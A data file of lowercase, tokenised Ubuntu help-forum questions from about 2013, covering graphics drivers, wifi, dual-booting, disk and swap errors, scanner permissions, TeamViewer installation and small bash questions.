364070	ubuntu optimus support ?	when will ubuntu ( or a linux kernel ) have native nvidia optimus support ? estimates ? weeks/months/years ? `` native nvidia optimus support '' as in when i run a graphically-demanding application , my nvidia graphics card will automatically kick in ( like in windows ) . or at least a way that i could click some button to turn my gpu on for when i want to run any game*** i heard somewhere that manjaro allegedly had native optimus support ; is this true ? if so , is there a way to implement this in ubuntu ? i 'm running bumblebee right now , yes i know what it is and what it does , but it 's extremely impractical . i ca n't game on linux with this . you have to start applications via command line/terminal , and usually most modern games are n't just one function ( ie : when you call on the `` game '' , it 's really just a loader/splash screen , that calls upon other functions ; and when the secondary functions are called , they 're not optirun'ed ) *
364074	selling customized versions of ubuntu	my question is next : `` can i modify some version of ubuntu linux , add some software related to electrical engineering , modify look and some functions of ubuntu , basicaly customize the entire system so it suits the needs of electrical engineers working on the field or in the office , and then that customized system sell in order to make profit ? '' i 'm not sure am i allowed to do that ( is it legal ? ) , so i would appreciate answer . thank you in advance .
364075	nothing appears in additional drivers	i had updated my graphics driver to possibly see if i could get garry 's mod to run , but when i restarted my computer , it would just stay blank . so i opened up the console and typed `` sudo apt-get purge nvidia* '' and then `` sudo apt-get install xserver-xorg-video-nouveau '' which fixed that problem . but now i see nothing in my additional drivers and it says `` no proprietary drivers are in use on this system '' . when i do the command `` sudo apt-get install nvidia-current '' all it says is '' package nvidia-current is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'nvidia-current ' has no installation candidate '' any help would be appreciated . i am on ubuntu 12.04 64bit and my graphics card is a geforce 6150se nforce 430
364078	can not download files in the correct directory in ubuntu	before starting the question , let me describe the basic information of my desktop . i install ubuntu through windows installer . it only allows me to assign 30g to the ubuntu system . i only install 6g software in my ubuntu system . so it should have about 23g free spaces . the following is my current file systems : @ ubuntu : ~ $ df -h filesystem size used avail use % mounted on /dev/loop0 29g 29g 0 100 % / udev 7.9g 4.0k 7.9g 1 % /dev tmpfs 3.2g 888k 3.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.9g 1.3m 7.9g 1 % /run/shm /dev/sdb1 1.9t 30g 1.8t 2 % /host /dev/sda3 1.9t 44g 1.8t 3 % /media/os i want to put all of my projects in the /dev/sdb1 . since it said that it 's mounted on /host . so i create a directory `` project '' on host . and using svn to check out the project from the server to ./host/project . this project is about 30g . so it definitely can not fit to ubuntu system . and checking out gives me an error there is not enough space . i though putting it in ./host means putting it in ./dev/sdb1 . it seems it 's not . now the problem is where are the checked out files ? the /host/project is empty . but my ubuntu system is almost full . thanks ,
364080	all my files are gone	i am new to ubuntu , i tried to install it from a usb drive created by lili in windows , now when i reboot and start installing ubuntu , i did not get `` install alongside windows 8 `` option for a reason , i rushed things in and created logical drive over the drive that has windows 8 on it . after installed ubuntu successfully , everything is gone , my partitions , even the recovery partition . i am not asking to do all the work for me , i really tried couple of things , but before processed , i want to know if there is a hope for me or is it completely gone ! ?
364081	my folder-encrypted ubuntu 12.04 lts takes too long to shut down	recently i re-installed ubuntu 12.04 lts , and i encrypted my home folder . when i turn it on , it says dev/mapper/cryptswap1 . and like i said in the title , it takes too long to shut down . i 've looked on other forums and i 've tried to write on the terminal sudo blkid | grep swap , but when i do it it says /dev/mapper/cryptswap1 : uuid= '' 2ebec466-101c-4700-8c3b-af4ba4754ccb '' type= '' swap '' instead of uuid= '' 6afe8dec-350c-424e-b902-18e7a6a0f227 ( which what says in other forums ' responses ) . what should i do ?
364084	ubuntu 13.04 wifi driver issues	i am very new to ubuntu and have installed 13.04 on my dell inspiron mini 1012 . when i go into settings and open additional drivers to enable the `` using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) , '' it will try to apply the changes but immediately stop and go back to `` do not use the device . '' i have looked to many solutions that require an active internet access , which not even my ethernet will work . i 'm not sure what info to provide but my question is can you download these drivers to a flash drive and install them manually ? if so , where would i find them ? please let me know if you need anything else to answer my question .
364091	tplink wn8200nd usb wifi not working	i have an ubuntu version in a desktop pc , and i have an usb wifi adaptador brand tp-link wn8200nd with a chipset brand realtek rtl8192cu , and i ca n't make it work . i 've tried everything , ndiswrapper , driver 's linux and when i put 'lsusb ' not recognize and when i put 'iwconfig ' not appear 'wlan0'
364092	why does this script work in the current directory but fail when placed in the path ?	i wish to replace my failing memory with a very small shell script . # ! /bin/sh if ! [ âa $ 1.sav ] ; then mv $ 1 $ 1.sav cp $ 1.sav $ 1 fi nano $ 1 is intended to save the original version of a script . if the original has been preserved before , it skips the move-and-copy-back ( and i use move-and-copy-back to preserve the original timestamp ) . this works as intended if , after i make it executable with chmod i launch it from within the directory where i am editing , e.g . with ./safe.sh filename however , when i move it into /usr/bin ( so it is in the path as verified with echo $ path ) and then i try to run it in a different directory ( without the leading ./ ) it fails with -bash : /usr/bin/safe.sh : /bin/sh : bad interpreter : text file busy d'oh ? inquiring minds want to know how to make this work .
364093	ubuntu server boot demands internet connection	i am running ubuntu 12.04.2 server . after i make my selection in grub , the boot process starts . when i have a wired connection to the internet ( the connection i used to install the system ) it boots fine . if that connection is missing however , the computer spends the next two minutes waiting for a wired connection . optimally , there would be a way for me to reduce this wait time after it fails to connect to 0 , but to have it such that it still makes the attempt to connect . is there a way to do this ? alternatively , is there a way to make it such that the computer does not attempt to connect to the internet at all during boot ? i am using the i3 tiling window manager ; not unity or gnome . graphical instructions will not work .
364095	where do i find repositories for the following packages , now that medibuntu is down ?	i do n't agree with this nonsense at all : the project is not really needed nowadays , except for one package : libdvdcss there was much more than libdvdcss in medibuntu . what i want now is , where are alternative repositories for the following packages ? non-free-codecs w64codecs [ yeah , this one hurts specially ! ] look at some examples error messages i got now without that packages : vlc does not support the audio or video format `` undf '' . unfortunately there is no way for you to fix this . vlc does not support the audio or video format `` iv41 '' . unfortunately there is no way for you to fix this .
364100	installing xubuntu alongside with uefi	for the past week and a half i have been trying to figure out how to install xubuntu 13.10 alongside the windows 7 install i have on my laptop ( asus x501a with uefi ) and i 'm pretty much at my wit 's end . could someone point me to set of thorough instructions on installing xubuntu ( or any of the ubuntu derivatives ) on a hdd under uefi alongside windows 7 64-bit home premium ? preferably one that also covers grub/bootloader problems that come afterwards . a few additional details : motherboard does have uefi . i 've disabled secure boot and fast boot . launch csm is enabled and the platform keys are not installed ( these settings allow me to at least boot windows 7 ) . i set the hdd 's partition table to gpt through gparted before i installed windows . i 'm installing from a bootable usb that has been created through a tool called rufus with the gpt partition scheme for uefi computers option , otherwise i 've left it at default . i am able to boot into xubuntu in uefi mode , but i 'd much rather be able to see the option : install xubuntu alongside windows 7 ( or however it 's phrased ) , xubuntu seems to be unable to recognize that windows 7 is installed . i do have access to a bootable usb stick containing gparted though xubuntu seems to come preinstalled with it . if there 's anything else that might be of help , please let me know .
364103	how to do upgrade	i have n't been on my computer in so long . so when i got on it and wanted to download files the update kept popping up . i clicked it on it and it told me that the version i was using is no longer supported . so im guessing that i need to update my update ?
364105	how do i access this folder in terminal ?	i 'm almost finished with this process of tethering my phone to my laptop from this guide http : //ubuntuforums.org/showthread.php ? t=1941773 however i ca n't get nautilus to provide an open in terminal command when i right click on the node folder that i need to access in the terminal . i can get the option to open the tether folder in terminal , but not the subfolder inside of it titled `` node '' if someone could help me to get nautilus to open the node folder in the terminal for me or if someone could show me how to manually open this node folder that 'd be great . and for some reason i can only manage to look at the tether 's sub folders from the archive manager and not from the file viewer itself where the open in terminal option would be available . also trying to extract anything i always get `` an error occured while extracting files . '' `` error setting owner : operation not permitted '' i 'm currently running ubuntu 3.10 if that helps . thank you for your time !
364112	wifi not connecting on linksys e1200 with dhcp reservation	i am having difficulty acquiring an ip address when running off my ubuntu ( 13.10 , but used to happen on 13.04 too ) partition and attempting to connect to the cisco linksys e1200 wireless router via wireless . this problem occurs only when dhcp reservation is enabled on the router to assign a fixed ip address for my laptop . this does not happen if i boot windows from the same pc . some observations : when i disable dhcp reservation and get an ip address , the conventional way on the ubuntu partition , i do n't have any problems . if i restart the router , ubuntu connects for the time being if i connect to my college network , and then come home and try to connect , the problem occurs.restarting the router enables ubuntu to connect again . none of the problems are observed in windows .
364114	why do i get terrible audio and green video in skype on 13.04 ?	just installed ubuntu 13.04 on my new y510p lenovo laptop . i believe i download skype for ubuntu 12.04 ( multiarch ) . i followed the instructions and when i open skype everything looks fine until i open a chat with someone . my video and their video to me is green . they say they can see me and the audio sounds robotic . any idea what is going on ? i have tried with a different usb webcam and same thing !
364115	no keyboard/mouse after boot	i have had 13.10 and win 7 dualbooting for about a week now - everything was perfect . yesterday - i select ubuntu from the grub menu - usb keyboard is lit . right after the selection - keyboard goes dark - ubuntu splash screen , then login screen - no keyboard or mouse . the kb works fine in win7 and was working fine in ubuntu - until now . what gives ? have n't made any bios changes - usb legacy was always enabled . i 'm at a loss - why would the kb/mouse just stop working when linux launches ?
364116	ubuntu/windows xp	hello i have a dell dimension 2400 running windows xp with ubuntu on a partition . the computer would start unbuntu as a default unless i scrolled down to xp and hit enter . the computer now `` hangs '' at start up plus ive lost any video out . there are power and hard drive lights on the front of the unit which light up green and stay solid . it never blinks or hesitates like its doing something . the computer also has abcd indicator lights on the back of the unit which are for troubleshooting . those also stay green which should be a good thing . ive gone through suggestions from the dell site such as remove or disconnecting components then reinstalling ( ie : ram , videocards ) , startup with windows cd cleaning the unit . i am not very savvy when it comes to computers but this desktop has be a great work horse and id love to salvage it . if anyone has the time to respond with any ideas id greatly appreciate it
364117	enable line numbers in gedit	i ca n't find how to enable the line numbers , current line highlight , and other goodness in 13.10 .
364118	recommendations for new ubuntu user ?	i just installed ubuntu and i 'm wondering if there is anything you recommend i do ? this is my first experience with an os other than windows so it all seems foreign to me .
364119	when i use the sound recorder on xubuntu 13.04 it wont alow me to record	i never had problems with it in 12.04 but now that i 'm in 13.04 this happens . it 's not that important but i would like to know what is wrong .
364120	keyboard ca n't switch languages	so i have something i wanted to type in korean , and decided to install korean on my ubuntu ( 13.04 ) . however , even though my ibus says that i am currently using korean , i am only getting text in english . here 's a screenshot . what exactly is going on ?
364121	how to install the printer driver for canon image running 2520 in ubuntu 13.10	i unable to install the printer driver in ubuntu ( ver 13.10 ) for canon image running 2520 . please tell the commands .thanks !
364123	ubuntu 12.04lts installing issue in laptop	when i try to install ubuntu 12.04 lts and 13.04 in windows machine by side by side getting an error message `` can not download the meta link and iso '' for more information.when i try to boot from boot order its loading and when i selectboot option along side windows system restarts and loads windows . please help
364129	ubuntu 13.10 mail authentication	since upgrading to ubuntu 13.10 my mail programs continuously ask for authentication ( password ) . i use gmail and use the 2-step verification . i have entered the google generated app password . problem is , every time i input it works until i close the mail program and re-open , then it wants me to input the authentication again . so , i have to go to google security , revoke access to the app and re-generate another one . what a hassle . at first , i thought maybe it was thunderbird , so i tried geary , then sylpheed , then claws . same thing with all of them . any fixes ? is this a known issue with the upgrade ?
364130	upgrading 13.04 hangs during `` unpacking ubuntu-wallpapers ''	upgrade stops during the `` unpacking ubuntu-wallpapers '' and the apt-term.log shows the last thing entered there was asking if i wanted to upgrade the conf file for the next package ( defaults ) -- this question should have been on the screen but it was printed to the terminal capture instead ! ! i opened a terminal and ran dpkg -- configure -a and the post-installation scripts ran fine . after completing these i issued a reboot from the command line , so the only step actually skipped is the `` cleaning up '' ( is there a command line to do this ? )
364135	no hdmi audio on radeon 6770 connected via hdmi to my tv	i just installed ubuntu 13.10 and everything works great except there is no audio . i am using a radeon 6770 connected via hdmi to my tv but under sound settings there is only analog or digital options . i would greatly appreciate any help to fix this issue .
364136	/dev/mapper/ubuntu -- vg-swap_1 is not ready or not present	this is frustrating as heck , i moved away from windows 7 os because of issues , errors , and such and was sold to ubuntu because it was supposed to be reliable , and now errors and issues right after installing 12.04 with dev/mapper/cryptswap1 and then got 13.10 to replace it , hoping issue was gone and now it 's still here anyway but different message reference . i only have one hard drive , it 's 1tb and it only had windows 7 on it and was never really used at all . i formatted it during both ubuntu version installations . so not sure why this issue keeps sporadically happening ... ! ? it 's not happening all the time though , just here and there after the computer has been shut off for few hours each time . my output for `` cat /etc/fstab '' is ... cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=737f749f-8ef5-4744-953f-81422ffc9000 /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 my output for `` sudo blkid '' is ... /dev/sda1 : uuid= '' 737f749f-8ef5-4744-953f-81422ffc9000 '' type= '' ext2 '' /dev/sda5 : uuid= '' 12bd13d8-f3ac-4606-828b-671c396d36f5 '' type= '' crypto_luks '' /dev/mapper/sda5_crypt : uuid= '' jdurxq-yfkr-eb52-opov-nlks-nybk-p5er2h '' type= '' lvm2_member '' /dev/mapper/ubuntu -- vg-root : uuid= '' 2b450222-9a24-4c38-97aa-e4d2e83e94c6 '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' 59fa5eff-d30f-4d1a-aa97-46fec43e805c '' type= '' swap '' i 'm just not sure why this issue would be happening though , it does n't make sense . the hard drive itself should be fine , reads as healthy and etc . ubuntu should be correctly assigning the privledges , running swap right , and etc starting to wonder if i should just go back to windows 7 , or linux mint , or some other linux os but they have same issues i 'm sure..
364143	dates set according to location not chosen language	i recently installed ubuntu 13.10 chose my location as thailand/bangkok , keyboard layout and language as south african english . everything seems to be set up correctly except wherever a date is displayed it is displayed in thai , instead of english . this is most noticeable in the clock indicator ( see images included for what i mean ) . how can i change my dates to english ( south african locale if possible ) .
364146	how to install programs downloaded from the internet ?	i 've downloadad the latest xampp file , to install it into ubuntu 13.04 . after downloading the file , i just can run it . i 've double click it ( and i 've tried right click and clicking `` open '' , whith the same result ) . all the answer i get is this message : could not display “xampp-linux-1.8.3-1-installer.run” . there is no application installed for “executable” files . do you want to search for an application to open this file ? i 've tried searching for an application , with no result ... also , i have n't found any questions related to this issue with the 13.04 unity version ... i 've tried this solution , with no result . please note that this is n't a xampp question , the same happened to me when i tried to install skype . update : i 've tried this solution : cd ~/downloads chmod +x myfile.run sudo sh myfile.run and i 've got this error : syntax error : `` ( `` unexpected what should i do ? thanks !
364151	how to change dolphin 's select region of a file/folder ( in detail view mode )	since nautilus has removed the dual pane . so i turn to dolphin . i am wondering how to change the default select behavior in detail view mode ? now to select a file/folder , my cursor has to hover over that file/folder and then the left click will take effect , but i much prefer the nautilus way , that is as long as your cursor is in the same row of that file/folder , left click picks up that item . this i think is more robust for user selection , it is faster . any ideas how to achieve this in dolphin ?
364156	ubuntu 13.10 , kernel still 3.8.0-31-generic	i updated from 13.04 to 13.10 but uname -r still says i am on 3.8.0-31-generic . how can i fix this and get 3.11 or 3.12 ?
364157	unable to compile programs in ubuntu with geany	i 'm having trouble compiling a simple c++ program in geany . the result is same even if i just use terminal ( not using geany ) .
364158	lubuntu 13.04 , kernel still 3.8.0-32-generic	my question is very similar to ubuntu 13.10 , kernel still 3.8.0-31-generic . recently was updating to saucy and the ethernet cable got unplugged . so i decided to run software update again , to reinstall files . it returned that `` everything is up to date '' . but according to these command-line searches , that is incorrect . how can i install saucy now safely ? sudo apt-get install lubuntu-desktop reading package lists ... done building dependency tree reading state information ... done lubuntu-desktop is already the newest version . the following package was automatically installed and is no longer required : linux-image-extra-3.8.0-19-generic use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . sudo apt-get update get:1 http : //extras.ubuntu.com raring release.gpg [ 72 b ] hit http : //extras.ubuntu.com raring release get:2 http : //az-1.hpcloud.mirror.websitedevops.com raring release.gpg hit http : //extras.ubuntu.com raring/main sources hit http : //extras.ubuntu.com raring/main i386 packages get:3 http : //az-1.hpcloud.mirror.websitedevops.com raring-updates release.gpg get:4 http : //az-1.hpcloud.mirror.websitedevops.com raring-backports release.gpg get:5 http : //az-1.hpcloud.mirror.websitedevops.com raring-security release.gpg get:6 http : //az-1.hpcloud.mirror.websitedevops.com raring release ign http : //extras.ubuntu.com raring/main translation-en_us ign http : //extras.ubuntu.com raring/main translation-en hit http : //ppa.launchpad.net raring release.gpg ign http : //az-1.hpcloud.mirror.websitedevops.com raring release e : gpg error : http : //az-1.hpcloud.mirror.websitedevops.com raring release : the following signatures were invalid : nodata 1 nodata 2 lsb_release -rd description : ubuntu 13.04 release : 13.04 uname -r 3.8.0-32-generic
364162	is there any way to get a key i no longer have access to deleted from the keyserver ?	the file was overwritten when i reformatted my hard drive . there are now 2 keys under my name registered on the site . i can prove i had access to the key , but i need to know where to ask for removal , or even if it 's possible .
364163	how to solve scanner permissions issues	my computer previously ran ubuntu 10.4 . after upgrading to 13.4 , my epson scanner no longer can be found by the system . following documentation , i find the following : $ sane-find-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . could not open usb device 0x046d/0x082b at 001:007 : access denied ( insufficient permissions ) ... # no usb scanners found . if you expected something different , make sure that # you have loaded a kernel driver for your usb host controller and have setup # the usb system correctly . see man sane-usb for details . ... if i instead run sudo sane-find-scanner , i get $ sudo sane-find-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . found usb scanner ( vendor=0x04b8 [ epson ] , product=0x0131 [ epson scanner ] ) at libusb:001:009 could not fetch string descriptor : pipe error could not fetch string descriptor : pipe error # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . so what do i do ? scanimage -l does nothing for me and i do n't know what the `` backend 's manpage '' might be . it 's seems likely that this is a permissions issue since the scanner can be found as root , but i do n't know how to solve it . can someone help ? update : i had also tried simple-scan and xsane . neither of them could find the scanner . that was what led me to try sane-find-scanner .
364164	bumblebee optirun appears to depend on intel	i have a lenovo t420 with intel and nvidia graphics . on upgrade to ubuntu saucy , i had to purge and reinstall bumblebee-nvidia to get beyond optirun failing to find a gpu driver . now , `` optirun glxgears '' and `` optirun sol '' succeed , but optirun fails on 2 virtual life viewers that it supported in the past , cool vl ( coolvlviewer-1.26.8.34-linux-x86 ) and imprudence ( imprudence 1.4.0 beta2 ) . in both cases , the error output is huge , but it starts with libgl error : failed to load driver : i965 and libgl error : failed to load driver : swrast from the little i can discover , i965 is an intel graphics driver , which should not be invoked at all . i have n't found any information about swrast . i suspect that some of the x configuration associated with bumblebee has some intel dependence that is invoked on certain library calls , but not others . i have n't discovered any definite information on this line . the cool vl viewer runs without optirun , but complains about the insufficiency of the intel graphics .
364169	remote dekstop connection to virtualized windows desktop not working	i may be explaining this wrong in the title so i will walk you through my situation here and then put the contents of the .rdp file below . my company uses rdweb hosted on windows server 2012 to allow employees to create a virtual desktop and access created apps . i 've successfully connected to it often before on a windows machine and the process starts with logging in to https : //rdweb.domain.com/rdweb . log in with company credentials and from there you click on the rdp file and it opens the login interface and good to go . the only reason i mention this is that i have saved the rdp file on a windows machine and i can open and successfully connect without having to log in to the rdweb site . is it possible to connect via ubuntu ? i have tried in rdesktop and in the built in remmina , but i ca n't seem to get the setting right . here is the text of the rdp file that is downloaded , the only thing i changed was the names of servers and addresses : redirectclipboard : i:1 redirectprinters : i:1 redirectcomports : i:0 redirectsmartcards : i:1 devicestoredirect : sr > : * drivestoredirect : s : * redirectdrives : i:1 session bpp : i:32 prompt for credentials on client : i:1 server port : i:3389 allow font smoothing : i:1 promptcredentialonce : i:1 videoplaybackmode : i:1 audiocapturemode : i:1 gatewayusagemethod : i:2 gatewayprofileusagemethod : i:1 gatewaycredentialssource : i:0 full address : s : server.domain.local gatewayhostname : s : rdweb.webdomain.com workspace id : s : server.domain.local use redirection server name : i:1 loadbalanceinfo : s : tsv : //vmresource.1.bt_virtual_desk use multimon : i:1
364176	can i put ubuntu on an asus vivobook f202 ?	i 'm looking to buy an asus vivobook f202 with an i3 processor . will i be able to put ubuntu on it , especially with the touch function ? has anybody done that yet ? ta muchly .
364180	how to increase ubuntu 13.04 disk size from 16gb -wubi installation	i 'm incredibly new to ubuntu and linux overall . though i already prefer it greatly over windows , im stuck with one issue that is bothering me incredibly . i installed ubuntu 13.04 with wubi , and was following a guide from a different set up . at that time i choose hard drive size for ubuntu to be 16gb , assuming that there would be another screen to choose the size of the actual hard drive as there was in the one setup i read . was just wondering in which way i can increase my 16gb hard drive to something like 200gb . i have also windows as dual boot option . if i could get a nice easy step explanation that would be preferred greatly and would be much appreciated .
364182	ubuntu 13.10 installation stops	i tried to install ubuntu 13.10 on vmware server ( where i already have some other linux ( ubuntu ) machines ) . short after beginning the installation , it stops on screen bellow . any idea , what can i do ?
364184	window is n't always bring to front	wondering if this is a feature or can be configuration . ubuntu does n't always bring applications to the front sometimes it 'shakes the icon in the launcher ' seems to depend if the application is already open if i have an application already open e.g . nautilus , then try to open my drop box folder in nautilus via via drop box - > open folder . if nautilus is not already open it will be brought to the front . if nautilus is already open then the icon just 'shakes' any thoughts on how i can always get it to bring to front ?
364186	ubuntu 12.04 unable to load or access terminal	i 'm new to the linux world and installed ubuntu 12.04 . i then tried to update my graphics driver , which needed to reboot once the installation process was completed . upon reboot , i was sent to a black screen with a bunch of writing on it , basically saying that my graphics driver had `` failed '' . i have scoured the internet and am unable to follow any of the advice that people have put out there . i can not access `` recovery mode '' no matter how many times i boot and hold down shift . i can not access terminal at all , even trying to hold down ctrl+alt+f1 . i have tried holding down tab to try and access any sort of menu that will allow me to type in the command to uninstall the graphics driver , but i can not seem to find any way of booting that allows me to type anything at all . any help would be greatly appreciated . thanks
364187	how to transfer files from a windows environment to ubuntu touch ?	i installed the ubuntu touch on my galaxy nexus by flashing it thru recovery , but i ca n't transfer files from my computer to it . right now i 'm in a windows environment ( windows 8 ) and i do n't want to install ubuntu just to transfer files . is there something i can do to transfer them ( besides using adb push ) ? right now my computer detects my ubuntu touch phone like this : http : //puu.sh/4x9mb.png http : //puu.sh/4x9mn.png if i try to create folders inside this folder or try to paste anything it says i do n't have permission . is there something i 'm missing ?
364188	ubuntu touch on nexus 7 : why no ld-linux.so* ?	short version : installed ubuntu touch , and noticed that there 's no /lib/ld-linux.so.3 dynamic linker ( symlink or otherwise ) . first time i 've seen this missing from a linux installation . is there any particular reason it is n't there ? long version : i just installed ubuntu touch ( 13.10 , stable ) on a first-gen nexus 7 , and i want to try some arm-targeted compilation on it . i installed the gcc-arm-linux-gnueabi package on my ubuntu desktop ( 12.04 , incidentally ) and compiled a simple `` hello world '' in c , then copied it over to the nexus , ssh 'd in , and ran the executable ( nexustest ) . the response was : -bash : ./nexustest : no such file or directory ultimately i found that this was because ubuntu was failing to even load the ld-linux.so dynamic linker . as per usual on a non-statically-linked linux executable , ldd nexustest shows that it 's looking for /lib/ld-linux.so.3 , and the ubuntu touch installation does n't have that . i can `` fix '' this with either of the following , in which case the `` hello world '' runs as expected : copying or symlinking /lib/ld-linux-armhf.so.3 to /lib/ld-linux.so.3 -- suggesting that ld-linux-armhf.so.3 is the right dynamic linker compiling ( linking ) the executable with -static -- suggesting that arm-linux-gnueabi-gcc is using the right linker/arch from the gcc and linux linking perspective , everything seems to be working as expected , except that there 's no /lib/ld-linux.so.3 on my nexus 7 ( which i expect should just be a symlink to ld-linux-armhf.so.3 ) . why is that ? is the omission a mistake , or some intentional distro-design decision that i 'm just not getting ?
364190	configure bash to print exit status of every command entered	every command that i type on bash returns with an exit code . i want : whenever i type a command on bash prompt , i want it to exit and print exit status i.e . echo $ ? . e.g . if i run echo `` hello '' ; on bash prompt , the output should be : linux @ linux $ hello linux @ linux $ 0
364191	cut column from list	how can i cut second column from the following list from terminal ? 56 267 57 235 58 255 59 283
364194	wifi icon blinking . repeated authentication request	i just installed ubuntu 13.10 . my wifi is not working at all . the wifi icon is blinking and asks me to provide the username and password every 10 seconds after trying to connect . any suggestions ? i have inspiron n5110 and the wireless card is intel centrino n-1030 .
364196	change root account profile picture ?	in my ubuntu system , i have two users including root . i tried to change the root user account profile picture . i ca n't find where it is . can you please help me ? thanks .
364197	what this following bash script file do ?	while browsing through hidden files of my home directory , i have found .bash_logout . i came through this content in the file if [ `` $ shlvl '' = 1 ] ; then [ -x /usr/bin/clear_console ] & & /usr/bin/clear_console -q fi i am not much good with bash & i am requesting that , could somebody explain that for me . whats the deal with shlvl ? thank you .
364198	what rar password recover tools are available ?	long ago i have made my archive with images by protecting it with a password but i have forgot the password and i made many trails to crack it with my general combinations but failed . could somebody help me with some reliable solutions . thank you .
364199	no login sound on desktop load ?	it used to be that it would play the /usr/share/sounds/ubuntu/stereo/desktop-login.ogg when you login to ubuntu , but it would seem that i am not getting any sound . i realized today its been like that for a long time , i may have edited something to disable it as i did not exactly like it . but as i have edit a music file i do like to replace the login file i want to play it again . what files do i need to edit to bring back my login sound ? also is there a limit to how long the desktop-login.ogg file can be ? cause mine is just over 1min long and the original file is 7sec long .
364200	whats the problem with rarcrack ?	i have installed rarcrack but whats the issue with it i am not getting . here the code of the terminal root @ ubuntu : ~/sec # sudo apt-get install rarcrack reading package lists ... done building dependency tree reading state information ... done rarcrack : i386 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ ubuntu : ~/sec # rarcrack english.zip -bash : /usr/bin/rarcrack : no such file or directory root @ ubuntu : ~/sec # which rarcrack /usr/bin/rarcrack root @ ubuntu : ~/sec # rarcrack english.zip -bash : /usr/bin/rarcrack : no such file or directory root @ ubuntu : ~/sec #
364203	`` alloc magic is broken . aborted '' and `` unaligned pointer xxxx . aborted ''	i have installed ubuntu 12.04 on my hp desktop recently . for few days it worked fine and after that it got froozen and when i restarted the system i got some weird errors like `` unaligned pointer xxxx . aborted `` or `` alloc magic is broken xxxxx . aborted . '' when i left the system for a while and then restarted it started but again after 15-20 minutes it hanged . i tried installing the grub again from live usb but still i am facing the same problem . kindly help me out on this . i could n't find the fix for this till now .
364211	teamviewer can not install on 13.10 - no teamviewerd	i tried to install teamviewer 8 on xubuntu 13.10 after the first problems i tries this solution : teamviewer dependends of lib32asound2 but that doese n't work either , after trying ( as root ) apt-get install libc6 : i386 libgcc1 : i386 libasound2 : i386 libfreetype6 : i386 zlib1g : i386 libsm6 : i386 libxdamage1 : i386 libxext6 : i386 libxfixes3 : i386 libxrender1 : i386 libxtst6 : i386 wget http : //www.teamviewer.com/download/teamviewer_linux.deb dpkg -i teamviewer_linux.deb i get these messages : vorbereitung zum ersetzen von teamviewer 8.0.20931 ( durch teamviewer_linux.deb ) ... initctl : unbekannter auftrag : teamviewerd ersatz f端r teamviewer wird entpackt ... teamviewer ( 8.0.20931 ) wird eingerichtet ... initctl : unbekannter auftrag : teamviewerd i guess in english : initctl : unknown task : teamviewerd after some apt-get upgrades during the last days , this seem to be fixed by now : sudo service teamviewerd start starts the deamon now and i can start teamviewer after that . the strange thing is , that i have to start the teamviewerd now by hand each time i want to use teamviewer ( before the upgrade teamviewer could start right away )
364213	ubuntu touch softwate camera	i want to make an offer for the software for the camera . offered in the software for the camera by default assigned to the shutter button one action , for example , take a picture . on the motion of the button to the left to assign a different action , for example , record a video . at the touch button to the right to assign the action to make a picture panormny . and to add the ability to customize these actions . ps : sorry for my english .
364215	ubuntu13.10 upgrade , now i have to login twice	i originally had 13.04 on my machine . when i would start the computer it would bring me to the graphical ubuntu login screen . every thing was fine . i upgraded to 13.10 and now when i start the computer i get a command prompt , i have to log in . after 10 seconds after login in the computer starts compiz/unity and takes me to the graphical login screen . how do i fix this so i only have to log in once ? make it so i do not get the command prompt login . i might guess this is a bug that may be addressed in a week or two ? thanks .
364219	network connection icon has disappeared from the panel in ubuntu 13.10	i successfully installed ubuntu 13.10 from ubuntu 13.04 . when i tried to install java in the terminal , i got a message that said : some repository files failed to download . they have been ignored , or old ones used instead . when i rebooted the computer , the network connection icon had disappeared from the panel . how can i restore the network connection icon to my panel ?
364221	failed to attach the usb device - skymedi usb drive	i try to attach a usb drive in a virtual box ubuntu 12.04 . i select devices from the menu and then usb devices . i select the usb drive . error message failed to attach the usb device skymedi usb drive [ 0100 ] to the virtual machine ubuntu . usb device 'skymedi usb drive ' with uuid { -some big hexadecimal number- } is busy with a previous request . please try again later result code : e_invalidarg ( 0x80070057 ) component : hostusbdevice interface : ihostusbdevice { 173b4b44-d268-4334-a00d-b6521c9a740a } callee : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } though it is of brand kingston , it shows skymedi usb drive . and the pen drive does not show up . i also have another pen drive of same type and brand which runs just fine on virtual box ubuntu .
364222	what waked up my computer ?	i want to know if there is a command or program that shows the reason of the last wakeup from suspend . in windows exists a builtin command which shows the last wakeup reason , for example the keyboard or mouse , or via wol . the thing is that it happened already 2 times to find my computer awake in the morning when i clearly put it to sleep at night . /var/log/pm-suspend.log : tue oct 22 23:50:24 eest 2013 : performing suspend wed oct 23 08:24:11 eest 2013 : awake . wed oct 23 08:24:11 eest 2013 : running hooks for resume /var/log/syslog dmesg ps : default 13.10 installation , wol enabled , but i do n't think this is a problem since i used wol before ( with archlinux and suse ) and it only woke when i told it to do so .
